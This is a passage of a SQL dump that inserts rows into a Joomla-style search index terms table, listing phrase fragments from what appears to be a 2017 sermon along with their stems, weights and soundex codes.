(292281, 'spirit dressing god', 'spirit dressing god', 0, 1, 1.6333, 'S16362523', 1, '*'),
(292282, 'spirit is what', 'spirit is what', 0, 1, 1.4667, 'S16323', 1, '*'),
(292283, 'spirit joseph', 'spirit joseph', 0, 1, 1.4333, 'S16321', 1, '*'),
(292284, 'spirit joseph carried', 'spirit joseph carried', 0, 1, 1.7, 'S16321263', 1, '*'),
(292285, 'spirit of accountability', 'spirit of accountability', 0, 1, 1.8, 'S1631253143', 1, '*'),
(292286, 'spirit of accuracy', 'spirit of accuracy', 0, 1, 1.6, 'S1631262', 1, '*'),
(292287, 'spirit of courage', 'spirit of courage', 0, 1, 1.5667, 'S1631262', 1, '*'),
(292288, 'spirit of faith', 'spirit of faith', 0, 1, 1.5, 'S16313', 1, '*'),
(292289, 'spirit of life', 'spirit of life', 0, 1, 1.4667, 'S163141', 1, '*'),
(292290, 'spirit of precision', 'spirit of precision', 0, 1, 1.6333, 'S1631625', 1, '*'),
(292291, 'spirit of truth', 'spirit of truth', 0, 1, 1.5, 'S1631363', 1, '*'),
(292292, 'spirit of victory', 'spirit of victory', 0, 1, 1.5667, 'S1631236', 1, '*'),
(292293, 'spirit that pays', 'spirit that pays', 0, 1, 1.5333, 'S16312', 1, '*'),
(292294, 'spirit the spirit', 'spirit the spirit', 0, 1, 1.5667, 'S1632163', 1, '*'),
(292295, 'spirit there', 'spirit there', 0, 1, 1.4, 'S1636', 2, '*'),
(292296, 'spirit there is', 'spirit there is', 0, 1, 1.5, 'S16362', 1, '*'),
(292297, 'spirit there\'s', 'spirit there', 0, 1, 1.4667, 'S16362', 1, '*'),
(292298, 'spirit there\'s nobody', 'spirit there nobody', 0, 1, 1.7, 'S16362513', 1, '*'),
(292299, 'spirit this', 'spirit this', 0, 1, 1.3667, 'S1632', 2, '*'),
(292300, 'spirit this year', 'spirit this year', 0, 1, 1.5333, 'S16326', 1, '*'),
(292301, 'spirit till', 'spirit till', 0, 1, 1.3667, 'S1634', 1, '*'),
(292302, 'spirit till next', 'spirit till next', 0, 1, 1.5333, 'S1634523', 1, '*'),
(292303, 'spirit will give', 'spirit will give', 0, 1, 1.5333, 'S163421', 1, '*'),
(292304, 'spirits you', 'spirit you', 0, 1, 1.3667, 'S1632', 1, '*'),
(292305, 'spirits you will', 'spirit you will', 0, 1, 1.5333, 'S16324', 1, '*'),
(292306, 'spoken expressly', 'spoken expressly', 0, 1, 1.5333, 'S12521624', 1, '*'),
(292307, 'spoken expressly to', 'spoken expressly to', 0, 1, 1.6333, 'S125216243', 1, '*'),
(292308, 'start a fight', 'start a fight', 0, 1, 1.4333, 'S363123', 1, '*'),
(292309, 'status dressing', 'statu dressing', 0, 1, 1.5, 'S3236252', 1, '*'),
(292310, 'status dressing reflects', 'statu dressing reflects', 0, 1, 1.8, 'S3236252614232', 1, '*'),
(292311, 'steal', 'steal', 0, 0, 0.3333, 'S340', 1, '*'),
(292312, 'steal spirit', 'steal spirit', 0, 1, 1.4, 'S342163', 1, '*'),
(292313, 'steal spirit of', 'steal spirit of', 0, 1, 1.5, 'S3421631', 1, '*'),
(292314, 'succeeds', 'succe', 0, 0, 0.5333, 'S320', 1, '*'),
(292315, 'succeeds in', 'succe in', 0, 1, 1.3667, 'S325', 1, '*'),
(292316, 'succeeds in life', 'succe in life', 0, 1, 1.5333, 'S32541', 1, '*'),
(292317, 'successful get', 'success get', 0, 1, 1.4667, 'S1423', 1, '*'),
(292318, 'successful get ready', 'success get ready', 0, 1, 1.6667, 'S142363', 1, '*'),
(292319, 'take place in', 'take place in', 0, 1, 1.4333, 'T21425', 1, '*'),
(292320, 'take the road', 'take the road', 0, 1, 1.4333, 'T2363', 1, '*'),
(292321, 'takes lawfully', 'take lawfully', 0, 1, 1.4667, 'T2414', 1, '*'),
(292322, 'takes lawfully at', 'take lawfully at', 0, 1, 1.5667, 'T24143', 1, '*'),
(292323, 'takes the', 'take the', 0, 1, 1.3, 'T230', 1, '*'),
(292324, 'takes the spirit', 'take the spirit', 0, 1, 1.5333, 'T232163', 1, '*'),
(292325, 'takes you', 'take you', 0, 1, 1.3, 'T200', 1, '*'),
(292326, 'takes you to', 'take you to', 0, 1, 1.4, 'T230', 1, '*'),
(292327, 'talks of no', 'talk of no', 0, 1, 1.3667, 'T4215', 1, '*'),
(292328, 'tells the', 'tell the', 0, 1, 1.3, 'T423', 1, '*'),
(292329, 'tells the enemy', 'tell the enemy', 0, 1, 1.5, 'T4235', 1, '*'),
(292330, 'that can take', 'that can take', 0, 1, 1.4333, 'T2532', 1, '*'),
(292331, 'that causes', 'that causes', 0, 1, 1.3667, 'T200', 1, '*'),
(292332, 'that causes a', 'that causes a', 0, 1, 1.4333, 'T200', 1, '*'),
(292333, 'that does', 'that does', 0, 1, 1.3, 'T200', 1, '*'),
(292334, 'that does not', 'that does not', 0, 1, 1.4333, 'T253', 1, '*'),
(292335, 'that draws', 'that draws', 0, 1, 1.3333, 'T620', 1, '*'),
(292336, 'that draws you', 'that draws you', 0, 1, 1.4667, 'T620', 1, '*'),
(292337, 'that god with', 'that god with', 0, 1, 1.4333, 'T230', 1, '*'),
(292338, 'that it takes', 'that it takes', 0, 1, 1.4333, 'T200', 1, '*'),
(292339, 'that nature', 'that nature', 0, 1, 1.3667, 'T536', 1, '*'),
(292340, 'that nature that', 'that nature that', 0, 1, 1.5333, 'T5363', 1, '*'),
(292341, 'that pays', 'that pays', 0, 1, 1.3, 'T120', 1, '*'),
(292342, 'that pays attention', 'that pays attention', 0, 1, 1.6333, 'T123535', 1, '*'),
(292343, 'that spirit joseph', 'that spirit joseph', 0, 1, 1.6, 'T216321', 1, '*'),
(292344, 'that spirit there\'s', 'that spirit there', 0, 1, 1.6333, 'T216362', 1, '*'),
(292345, 'that spirit this', 'that spirit this', 0, 1, 1.5333, 'T21632', 1, '*'),
(292346, 'that succeeds', 'that succeeds', 0, 1, 1.4333, 'T232', 1, '*'),
(292347, 'that succeeds in', 'that succeeds in', 0, 1, 1.5333, 'T2325', 1, '*'),
(292348, 'that the accuser', 'that the accuser', 0, 1, 1.5333, 'T260', 1, '*'),
(292349, 'that the enemy', 'that the enemy', 0, 1, 1.4667, 'T500', 1, '*');
INSERT INTO `y57u5_finder_terms` (`term_id`, `term`, `stem`, `common`, `phrase`, `weight`, `soundex`, `links`, `language`) VALUES
(292350, 'the accusation', 'the accusation', 0, 1, 1.4667, 'T235', 1, '*'),
(292351, 'the accusation comes', 'the accusation comes', 0, 1, 1.6667, 'T235252', 1, '*'),
(292352, 'the accusation let', 'the accusation let', 0, 1, 1.6, 'T23543', 1, '*'),
(292353, 'the accuser', 'the accuser', 0, 1, 1.3667, 'T260', 1, '*'),
(292354, 'the accuser the', 'the accuser the', 0, 1, 1.5, 'T263', 1, '*'),
(292355, 'the accuser will', 'the accuser will', 0, 1, 1.5333, 'T264', 1, '*'),
(292356, 'the arena', 'the arena', 0, 1, 1.3, 'T650', 1, '*'),
(292357, 'the arena of', 'the arena of', 0, 1, 1.4, 'T651', 1, '*'),
(292358, 'the bulk', 'the bulk', 0, 1, 1.2667, 'T142', 1, '*'),
(292359, 'the bulk of', 'the bulk of', 0, 1, 1.3667, 'T1421', 1, '*'),
(292360, 'the enemy cannot', 'the enemy cannot', 0, 1, 1.5333, 'T5253', 1, '*'),
(292361, 'the enemy will', 'the enemy will', 0, 1, 1.4667, 'T540', 1, '*'),
(292362, 'the enemy “listen', 'the enemy “listen', 0, 1, 1.5667, 'T54235', 1, '*'),
(292363, 'the fight', 'the fight', 0, 1, 1.3, 'T123', 1, '*'),
(292364, 'the fight before', 'the fight before', 0, 1, 1.5333, 'T12316', 1, '*'),
(292365, 'the following dressings', 'the following dressings', 0, 1, 1.7667, 'T145236252', 1, '*'),
(292366, 'the future nobody', 'the future nobody', 0, 1, 1.5667, 'T136513', 1, '*'),
(292367, 'the heart a', 'the heart a', 0, 1, 1.3667, 'T630', 1, '*'),
(292368, 'the house for', 'the house for', 0, 1, 1.4333, 'T216', 1, '*'),
(292369, 'the minute', 'the minute', 0, 1, 1.3333, 'T530', 1, '*'),
(292370, 'the minute you', 'the minute you', 0, 1, 1.4667, 'T530', 1, '*'),
(292371, 'the names', 'the names', 0, 1, 1.3, 'T520', 1, '*'),
(292372, 'the names of', 'the names of', 0, 1, 1.4, 'T521', 1, '*'),
(292373, 'the offer', 'the offer', 0, 1, 1.3, 'T160', 1, '*'),
(292374, 'the offer of', 'the offer of', 0, 1, 1.4, 'T161', 1, '*'),
(292375, 'the others', 'the others', 0, 1, 1.3333, 'T620', 1, '*'),
(292376, 'the others ran', 'the others ran', 0, 1, 1.4667, 'T6265', 1, '*'),
(292377, 'the promised', 'the promised', 0, 1, 1.4, 'T16523', 1, '*'),
(292378, 'the promised land', 'the promised land', 0, 1, 1.5667, 'T16523453', 1, '*'),
(292379, 'the rank', 'the rank', 0, 1, 1.2667, 'T652', 1, '*'),
(292380, 'the rank of', 'the rank of', 0, 1, 1.3667, 'T6521', 1, '*'),
(292381, 'the right dressing', 'the right dressing', 0, 1, 1.6, 'T6236252', 1, '*'),
(292382, 'the right spirit', 'the right spirit', 0, 1, 1.5333, 'T6232163', 1, '*'),
(292383, 'the road spirit', 'the road spirit', 0, 1, 1.5, 'T632163', 1, '*'),
(292384, 'the situation around', 'the situation around', 0, 1, 1.6667, 'T235653', 1, '*'),
(292385, 'the spirit that', 'the spirit that', 0, 1, 1.5, 'T2163', 1, '*'),
(292386, 'the successful', 'the successful', 0, 1, 1.4667, 'T214', 1, '*'),
(292387, 'the successful get', 'the successful get', 0, 1, 1.6, 'T21423', 1, '*'),
(292388, 'the two things', 'the two things', 0, 1, 1.4667, 'T520', 1, '*'),
(292389, 'the words that', 'the words that', 0, 1, 1.4667, 'T6323', 1, '*'),
(292390, 'the wrong opponent', 'the wrong opponent', 0, 1, 1.6, 'T652153', 1, '*'),
(292391, 'then keep', 'then keep', 0, 1, 1.3, 'T521', 1, '*'),
(292392, 'then keep getting', 'then keep getting', 0, 1, 1.5667, 'T5212352', 1, '*'),
(292393, 'there are all', 'there are all', 0, 1, 1.4333, 'T640', 1, '*'),
(292394, 'there are spirits', 'there are spirits', 0, 1, 1.5667, 'T621632', 1, '*'),
(292395, 'there has', 'there has', 0, 1, 1.3, 'T620', 1, '*'),
(292396, 'there has been', 'there has been', 0, 1, 1.4667, 'T6215', 1, '*'),
(292397, 'there is cold', 'there is cold', 0, 1, 1.4333, 'T6243', 1, '*'),
(292398, 'there might', 'there might', 0, 1, 1.3667, 'T6523', 1, '*'),
(292399, 'there might be', 'there might be', 0, 1, 1.4667, 'T65231', 1, '*'),
(292400, 'there\'s', 'there', 0, 0, 0.4667, 'T620', 1, '*'),
(292401, 'there\'s nobody', 'there nobody', 0, 1, 1.4667, 'T62513', 1, '*'),
(292402, 'there\'s nobody that', 'there nobody that', 0, 1, 1.6333, 'T62513', 1, '*'),
(292403, 'these impartations', 'these impartations', 0, 1, 1.6, 'T2516352', 1, '*'),
(292404, 'these impartations and', 'these impartations and', 0, 1, 1.7333, 'T251635253', 1, '*'),
(292405, 'thing of', 'thing of', 0, 1, 1.2667, 'T521', 1, '*'),
(292406, 'thing of the', 'thing of the', 0, 1, 1.4, 'T5213', 1, '*'),
(292407, 'things are concerning', 'thing are concerning', 0, 1, 1.7, 'T526252652', 1, '*'),
(292408, 'things you need', 'thing you need', 0, 1, 1.5, 'T5253', 1, '*'),
(292409, 'this spirit', 'thi spirit', 0, 1, 1.3667, 'T2163', 1, '*'),
(292410, 'this spirit is', 'thi spirit is', 0, 1, 1.4667, 'T21632', 1, '*'),
(292411, 'this year and', 'thi year and', 0, 1, 1.4333, 'T2653', 1, '*'),
(292412, 'this year despite', 'thi year despite', 0, 1, 1.5667, 'T263213', 1, '*'),
(292413, 'this year god', 'thi year god', 0, 1, 1.4333, 'T2623', 1, '*'),
(292414, 'this year spirit', 'thi year spirit', 0, 1, 1.5333, 'T262163', 1, '*'),
(292415, 'this year you', 'thi year you', 0, 1, 1.4333, 'T260', 1, '*'),
(292416, 'three kinds', 'three kinds', 0, 1, 1.3667, 'T62532', 1, '*'),
(292417, 'three kinds of', 'three kinds of', 0, 1, 1.4667, 'T625321', 1, '*'),
(292418, 'through the names', 'through the names', 0, 1, 1.5667, 'T62352', 1, '*'),
(292419, 'time and then', 'time and then', 0, 1, 1.4333, 'T535', 1, '*'),
(292420, 'time getting', 'time getting', 0, 1, 1.4, 'T52352', 1, '*'),
(292421, 'time getting it', 'time getting it', 0, 1, 1.5, 'T523523', 1, '*'),
(292422, 'time winning', 'time winning', 0, 1, 1.4, 'T520', 1, '*'),
(292423, 'time winning is', 'time winning is', 0, 1, 1.5, 'T520', 1, '*'),
(292424, 'times and', 'time and', 0, 1, 1.3, 'T5253', 1, '*'),
(292425, 'times and season', 'time and season', 0, 1, 1.5333, 'T525325', 1, '*'),
(292426, 'times while', 'time while', 0, 1, 1.3667, 'T524', 1, '*'),
(292427, 'times while you', 'time while you', 0, 1, 1.5, 'T524', 1, '*'),
(292428, 'to a future', 'to a future', 0, 1, 1.3667, 'T136', 1, '*'),
(292429, 'to believe deep', 'to believe deep', 0, 1, 1.5, 'T14131', 1, '*'),
(292430, 'to details', 'to details', 0, 1, 1.3333, 'T420', 1, '*'),
(292431, 'to details people', 'to details people', 0, 1, 1.5667, 'T4214', 1, '*'),
(292432, 'to events', 'to events', 0, 1, 1.3, 'T1532', 1, '*'),
(292433, 'to events dressing', 'to events dressing', 0, 1, 1.6, 'T153236252', 1, '*'),
(292434, 'to give you', 'to give you', 0, 1, 1.3667, 'T210', 1, '*'),
(292435, 'to join', 'to join', 0, 1, 1.2333, 'T250', 1, '*'),
(292436, 'to join the', 'to join the', 0, 1, 1.3667, 'T253', 1, '*'),
(292437, 'to keep doing', 'to keep doing', 0, 1, 1.4333, 'T21352', 1, '*'),
(292438, 'to lose because', 'to lose because', 0, 1, 1.5, 'T4212', 1, '*'),
(292439, 'to me you\'ve', 'to me you', 0, 1, 1.4, 'T510', 1, '*'),
(292440, 'to occasions', 'to occasions', 0, 1, 1.4, 'T252', 1, '*'),
(292441, 'to occasions dressing', 'to occasions dressing', 0, 1, 1.7, 'T25236252', 1, '*'),
(292442, 'to possess', 'to possess', 0, 1, 1.3333, 'T120', 1, '*'),
(292443, 'to possess what', 'to possess what', 0, 1, 1.5, 'T123', 1, '*'),
(292444, 'to protect', 'to protect', 0, 1, 1.3333, 'T16323', 1, '*'),
(292445, 'to protect a', 'to protect a', 0, 1, 1.4, 'T16323', 1, '*'),
(292446, 'to take it', 'to take it', 0, 1, 1.3333, 'T230', 1, '*'),
(292447, 'to the words', 'to the words', 0, 1, 1.4, 'T632', 1, '*'),
(292448, 'to times', 'to times', 0, 1, 1.2667, 'T520', 1, '*'),
(292449, 'to times and', 'to times and', 0, 1, 1.4, 'T5253', 1, '*'),
(292450, 'to us concerning', 'to us concerning', 0, 1, 1.5333, 'T252652', 1, '*'),
(292451, 'to wear', 'to wear', 0, 1, 1.2333, 'T600', 1, '*'),
(292452, 'to wear as', 'to wear as', 0, 1, 1.3333, 'T620', 1, '*'),
(292453, 'to where your', 'to where your', 0, 1, 1.4333, 'T600', 1, '*'),
(292454, 'to win.”', 'to win.”', 0, 1, 1.2667, 'T500', 1, '*'),
(292455, 'to win.” and', 'to win.” and', 0, 1, 1.4, 'T530', 1, '*'),
(292456, 'truth there', 'truth there', 0, 1, 1.3667, 'T636', 1, '*'),
(292457, 'truth there are', 'truth there are', 0, 1, 1.5, 'T636', 1, '*'),
(292458, 'truth to', 'truth to', 0, 1, 1.2667, 'T630', 1, '*'),
(292459, 'truth to protect', 'truth to protect', 0, 1, 1.5333, 'T6316323', 1, '*'),
(292460, 'truth will', 'truth will', 0, 1, 1.3333, 'T634', 1, '*'),
(292461, 'truth will not', 'truth will not', 0, 1, 1.4667, 'T63453', 1, '*'),
(292462, 'two things you', 'two things you', 0, 1, 1.4667, 'T520', 1, '*'),
(292463, 'upon us', 'upon us', 0, 1, 1.2333, 'U152', 1, '*'),
(292464, 'upon us all', 'upon us all', 0, 1, 1.3667, 'U1524', 1, '*'),
(292465, 'upon your heart', 'upon your heart', 0, 1, 1.5, 'U1563', 1, '*'),
(292466, 'us a', 'us a', 0, 1, 1.1333, 'U200', 1, '*'),
(292467, 'us a key', 'us a key', 0, 1, 1.2667, 'U200', 1, '*'),
(292468, 'us all', 'us all', 0, 1, 1.2, 'U240', 1, '*'),
(292469, 'us all these', 'us all these', 0, 1, 1.4, 'U2432', 1, '*'),
(292470, 'us concerning', 'us concerning', 0, 1, 1.4333, 'U252652', 1, '*'),
(292471, 'us concerning this', 'us concerning this', 0, 1, 1.6, 'U25265232', 1, '*'),
(292472, 'valley', 'vallei', 0, 0, 0.4, 'V400', 1, '*'),
(292473, 'valley in', 'vallei in', 0, 1, 1.3, 'V450', 1, '*'),
(292474, 'valley in 2017', 'vallei in 2017', 0, 1, 1.4667, 'V450', 1, '*'),
(292475, 'victory assures', 'victori assures', 0, 1, 1.5, 'V236262', 1, '*'),
(292476, 'victory assures victory', 'victori assures victory', 0, 1, 1.7667, 'V2362621236', 1, '*'),
(292477, 'victory does', 'victori does', 0, 1, 1.4, 'V23632', 1, '*'),
(292478, 'victory does not', 'victori does not', 0, 1, 1.5333, 'V2363253', 1, '*'),
(292479, 'victory every', 'victori every', 0, 1, 1.4333, 'V23616', 1, '*'),
(292480, 'victory every time', 'victori every time', 0, 1, 1.6, 'V2361635', 1, '*'),
(292481, 'victory knows', 'victori knows', 0, 1, 1.4333, 'V236252', 1, '*'),
(292482, 'victory knows no', 'victori knows no', 0, 1, 1.5333, 'V2362525', 1, '*'),
(292483, 'victory the', 'victori the', 0, 1, 1.3667, 'V2363', 1, '*'),
(292484, 'victory the spirit', 'victori the spirit', 0, 1, 1.6, 'V23632163', 1, '*'),
(292485, 'we will do', 'we will do', 0, 1, 1.3333, 'W430', 1, '*'),
(292486, 'wear as', 'wear as', 0, 1, 1.2333, 'W620', 1, '*'),
(292487, 'wear as garments', 'wear as garments', 0, 1, 1.5333, 'W626532', 1, '*'),
(292488, 'wear that', 'wear that', 0, 1, 1.3, 'W630', 1, '*'),
(292489, 'wear that spirit', 'wear that spirit', 0, 1, 1.5333, 'W632163', 1, '*'),
(292490, 'what it takes', 'what it takes', 0, 1, 1.4333, 'W320', 1, '*'),
(292491, 'what makes a', 'what makes a', 0, 1, 1.4, 'W352', 1, '*'),
(292492, 'what the others', 'what the others', 0, 1, 1.5, 'W362', 1, '*'),
(292493, 'what will do', 'what will do', 0, 1, 1.4, 'W343', 1, '*'),
(292494, 'whats', 'what', 0, 0, 0.3333, 'W320', 1, '*'),
(292495, 'whats right', 'what right', 0, 1, 1.3667, 'W32623', 1, '*'),
(292496, 'whats right even', 'what right even', 0, 1, 1.5333, 'W3262315', 1, '*'),
(292497, 'when he interacts', 'when he interacts', 0, 1, 1.5667, 'W536232', 1, '*'),
(292498, 'when the offer', 'when the offer', 0, 1, 1.4667, 'W5316', 1, '*'),
(292499, 'where your', 'where your', 0, 1, 1.3333, 'W600', 1, '*'),
(292500, 'where your things', 'where your things', 0, 1, 1.5667, 'W6352', 1, '*'),
(292501, 'who you', 'who you', 0, 1, 1.2333, 'W000', 1, '*'),
(292502, 'who you are', 'who you are', 0, 1, 1.3667, 'W600', 1, '*'),
(292503, 'will call', 'will call', 0, 1, 1.3, 'W424', 1, '*'),
(292504, 'will call you', 'will call you', 0, 1, 1.4333, 'W424', 1, '*'),
(292505, 'will do all', 'will do all', 0, 1, 1.3667, 'W434', 1, '*'),
(292506, 'will give it', 'will give it', 0, 1, 1.4, 'W4213', 1, '*'),
(292507, 'will mark', 'will mark', 0, 1, 1.3, 'W4562', 1, '*'),
(292508, 'will mark your', 'will mark your', 0, 1, 1.4667, 'W45626', 1, '*'),
(292509, 'will need the', 'will need the', 0, 1, 1.4333, 'W453', 1, '*'),
(292510, 'will not face', 'will not face', 0, 1, 1.4333, 'W45312', 1, '*'),
(292511, 'will not give', 'will not give', 0, 1, 1.4333, 'W45321', 1, '*'),
(292512, 'will only be', 'will only be', 0, 1, 1.4, 'W4541', 1, '*'),
(292513, 'will take place', 'will take place', 0, 1, 1.5, 'W432142', 1, '*'),
(292514, 'willactually', 'willactu', 0, 0, 0.8, 'W4234', 1, '*'),
(292515, 'willactually end', 'willactu end', 0, 1, 1.5333, 'W423453', 1, '*'),
(292516, 'willactually end the', 'willactu end the', 0, 1, 1.6667, 'W423453', 1, '*'),
(292517, 'win.”', 'win.”', 0, 0, 0.3333, 'W500', 1, '*'),
(292518, 'win.” and', 'win.” and', 0, 1, 1.3, 'W530', 1, '*'),
(292519, 'win.” and he', 'win.” and he', 0, 1, 1.4, 'W530', 1, '*'),
(292520, 'winner', 'winner', 0, 0, 0.4, 'W560', 1, '*'),
(292521, 'winner is', 'winner is', 0, 1, 1.3, 'W562', 1, '*'),
(292522, 'winner is a', 'winner is a', 0, 1, 1.3667, 'W562', 1, '*'),
(292523, 'winning is', 'win is', 0, 1, 1.3333, 'W520', 1, '*'),
(292524, 'winning is an', 'win is an', 0, 1, 1.4333, 'W525', 1, '*'),
(292525, 'with deceptive', 'with deceptive', 0, 1, 1.4667, 'W32131', 1, '*'),
(292526, 'with deceptive men', 'with deceptive men', 0, 1, 1.6, 'W321315', 1, '*'),
(292527, 'with faith', 'with faith', 0, 1, 1.3333, 'W313', 1, '*'),
(292528, 'with faith as', 'with faith as', 0, 1, 1.4333, 'W3132', 1, '*'),
(292529, 'with me', 'with me', 0, 1, 1.2333, 'W350', 1, '*'),
(292530, 'with me we', 'with me we', 0, 1, 1.3333, 'W350', 1, '*'),
(292531, 'with sharpness', 'with sharpness', 0, 1, 1.4667, 'W326152', 1, '*'),
(292532, 'with sharpness to', 'with sharpness to', 0, 1, 1.5667, 'W3261523', 1, '*'),
(292533, 'with the spirit', 'with the spirit', 0, 1, 1.5, 'W32163', 1, '*'),
(292534, 'words that god', 'word that god', 0, 1, 1.4667, 'W632323', 1, '*'),
(292535, 'works upon', 'work upon', 0, 1, 1.3333, 'W6215', 1, '*'),
(292536, 'works upon your', 'work upon your', 0, 1, 1.5, 'W62156', 1, '*'),
(292537, 'wrong opponent', 'wrong opponent', 0, 1, 1.4667, 'W652153', 1, '*'),
(292538, 'wrong opponent get', 'wrong opponent get', 0, 1, 1.6, 'W65215323', 1, '*'),
(292539, 'wrong spirit', 'wrong spirit', 0, 1, 1.4, 'W652163', 1, '*'),
(292540, 'wrong spirit till', 'wrong spirit till', 0, 1, 1.5667, 'W6521634', 1, '*'),
(292541, 'year and', 'year and', 0, 1, 1.2667, 'Y653', 2, '*'),
(292542, 'year and there', 'year and there', 0, 1, 1.4667, 'Y6536', 1, '*'),
(292543, 'year despite', 'year despite', 0, 1, 1.4, 'Y63213', 1, '*'),
(292544, 'year despite the', 'year despite the', 0, 1, 1.5333, 'Y63213', 1, '*'),
(292545, 'year god', 'year god', 0, 1, 1.2667, 'Y623', 1, '*'),
(292546, 'year god through', 'year god through', 0, 1, 1.5333, 'Y62362', 1, '*'),
(292547, 'year spirit', 'year spirit', 0, 1, 1.3667, 'Y62163', 1, '*'),
(292548, 'year spirit of', 'year spirit of', 0, 1, 1.4667, 'Y621631', 1, '*'),
(292549, 'year you', 'year you', 0, 1, 1.2667, 'Y600', 1, '*'),
(292550, 'year you must', 'year you must', 0, 1, 1.4333, 'Y6523', 1, '*'),
(292551, 'year you will', 'year you will', 0, 1, 1.4333, 'Y640', 1, '*'),
(292552, 'you all kind', 'you all kind', 0, 1, 1.4, 'Y4253', 1, '*'),
(292553, 'you are dressing', 'you are dressing', 0, 1, 1.5333, 'Y636252', 1, '*'),
(292554, 'you are pleasing', 'you are pleasing', 0, 1, 1.5333, 'Y614252', 1, '*'),
(292555, 'you are ready', 'you are ready', 0, 1, 1.4333, 'Y630', 1, '*'),
(292556, 'you decide', 'you decide', 0, 1, 1.3333, 'Y323', 1, '*'),
(292557, 'you decide to', 'you decide to', 0, 1, 1.4333, 'Y323', 1, '*'),
(292558, 'you must hold', 'you must hold', 0, 1, 1.4333, 'Y52343', 1, '*'),
(292559, 'you must wear', 'you must wear', 0, 1, 1.4333, 'Y5236', 1, '*'),
(292560, 'you only what', 'you only what', 0, 1, 1.4333, 'Y543', 1, '*'),
(292561, 'you the kind', 'you the kind', 0, 1, 1.4, 'Y3253', 1, '*'),
(292562, 'you there might', 'you there might', 0, 1, 1.5, 'Y36523', 1, '*'),
(292563, 'you to a', 'you to a', 0, 1, 1.2667, 'Y300', 1, '*'),
(292564, 'you what you', 'you what you', 0, 1, 1.4, 'Y300', 1, '*'),
(292565, 'you will only', 'you will only', 0, 1, 1.4333, 'Y454', 1, '*'),
(292566, 'you with', 'you with', 0, 1, 1.2667, 'Y300', 2, '*'),
(292567, 'you with sharpness', 'you with sharpness', 0, 1, 1.6, 'Y326152', 1, '*'),
(292568, 'you\'ve picked', 'you picked', 0, 1, 1.4333, 'Y123', 1, '*'),
(292569, 'you\'ve picked the', 'you picked the', 0, 1, 1.5667, 'Y123', 1, '*'),
(292570, 'your accountability', 'your accountability', 0, 1, 1.6333, 'Y6253143', 1, '*'),
(292571, 'your accountability be', 'your accountability be', 0, 1, 1.7333, 'Y62531431', 1, '*'),
(292572, 'your faith there', 'your faith there', 0, 1, 1.5333, 'Y6136', 1, '*'),
(292573, 'your heart be', 'your heart be', 0, 1, 1.4333, 'Y631', 1, '*'),
(292574, 'your heart to', 'your heart to', 0, 1, 1.4333, 'Y630', 1, '*'),
(292575, 'your position and', 'your position and', 0, 1, 1.5667, 'Y612353', 1, '*'),
(292576, 'your protections', 'your protections', 0, 1, 1.5333, 'Y61632352', 1, '*'),
(292577, 'your protections be', 'your protections be', 0, 1, 1.6333, 'Y616323521', 1, '*'),
(292578, 'your things', 'your things', 0, 1, 1.3667, 'Y6352', 1, '*'),
(292579, 'your things are', 'your things are', 0, 1, 1.5, 'Y63526', 1, '*'),
(292580, 'your time getting', 'your time getting', 0, 1, 1.5667, 'Y6352352', 1, '*'),
(292581, '“listen', '“listen', 0, 0, 0.4667, '“4235', 1, '*'),
(292582, '“listen to', '“listen to', 0, 1, 1.3333, '“42353', 1, '*'),
(292583, '“listen to me', '“listen to me', 0, 1, 1.4333, '“423535', 1, '*'),
(292598, '1 discipline', '1 discipline', 0, 1, 1.4, 'D2145', 1, '*'),
(292599, '1 discipline you', '1 discipline you', 0, 1, 1.5333, 'D2145', 1, '*'),
(292600, '1 verse', '1 verse', 0, 1, 1.2333, 'V620', 2, '*'),
(292601, '1 verse 12', '1 verse 12', 0, 1, 1.3333, 'V620', 1, '*'),
(292602, '12 says', '12 says', 0, 1, 1.2333, 'S000', 2, '*'),
(292603, '12 says then', '12 says then', 0, 1, 1.4, 'S350', 1, '*'),
(292604, '18 from', '18 from', 0, 1, 1.2333, 'F650', 1, '*'),
(292605, '18 from our', '18 from our', 0, 1, 1.3667, 'F656', 1, '*'),
(292606, '2 watch', '2 watch', 0, 1, 1.2333, 'W320', 1, '*'),
(292607, '2 watch your', '2 watch your', 0, 1, 1.4, 'W326', 1, '*'),
(292608, '2017 god', '2017 god', 0, 1, 1.2667, 'G300', 1, '*'),
(292609, '2017 god wants', '2017 god wants', 0, 1, 1.4667, 'G3532', 1, '*'),
(292610, '22 01', '22 01', 0, 1, 1.1667, '', 1, '*'),
(292611, '22 01 2017', '22 01 2017', 0, 1, 1.3333, '', 1, '*'),
(292612, '3 search', '3 search', 0, 1, 1.2667, 'S620', 1, '*'),
(292613, '3 search the', '3 search the', 0, 1, 1.4, 'S623', 1, '*'),
(292614, '4 begin', '4 begin', 0, 1, 1.2333, 'B250', 1, '*'),
(292615, '4 begin to', '4 begin to', 0, 1, 1.3333, 'B253', 1, '*'),
(292616, '5 listen', '5 listen', 0, 1, 1.2667, 'L235', 1, '*'),
(292617, '5 listen well', '5 listen well', 0, 1, 1.4333, 'L2354', 1, '*'),
(292618, '6 don\'t', '6 don', 0, 1, 1.2333, 'D530', 2, '*'),
(292619, '6 don\'t speak', '6 don speak', 0, 1, 1.4333, 'D53212', 1, '*'),
(292620, '7 maintain', '7 maintain', 0, 1, 1.3333, 'M350', 1, '*'),
(292621, '7 maintain fellowship', '7 maintain fellowship', 0, 1, 1.7, 'M351421', 1, '*'),
(292622, 'a joke', 'a joke', 0, 1, 1.2, 'A200', 1, '*'),
(292623, 'a joke this', 'a joke this', 0, 1, 1.3667, 'A232', 1, '*'),
(292624, 'a program', 'a program', 0, 1, 1.3, 'A16265', 1, '*'),
(292625, 'a program now', 'a program now', 0, 1, 1.4333, 'A16265', 1, '*'),
(292626, 'a sickness', 'a sickness', 0, 1, 1.3333, 'A252', 1, '*'),
(292627, 'a sickness before', 'a sickness before', 0, 1, 1.5667, 'A25216', 1, '*'),
(292628, 'able to get', 'abl to get', 0, 1, 1.3667, 'A14323', 1, '*'),
(292629, 'able to progress', 'abl to progress', 0, 1, 1.5333, 'A14316262', 1, '*'),
(292630, 'about what', 'about what', 0, 1, 1.3333, 'A130', 1, '*'),
(292631, 'about what is', 'about what is', 0, 1, 1.4333, 'A132', 1, '*'),
(292632, 'accelerate', 'acceler', 0, 0, 0.6667, 'A2463', 1, '*'),
(292633, 'accelerate be', 'acceler be', 0, 1, 1.4333, 'A24631', 1, '*'),
(292634, 'accelerate be bold', 'acceler be bold', 0, 1, 1.6, 'A2463143', 1, '*'),
(292635, 'and fellow', 'and fellow', 0, 1, 1.3333, 'A5314', 1, '*'),
(292636, 'and fellow believers', 'and fellow believers', 0, 1, 1.6667, 'A531414162', 1, '*'),
(292637, 'and memorize', 'and memorize', 0, 1, 1.4, 'A53562', 1, '*'),
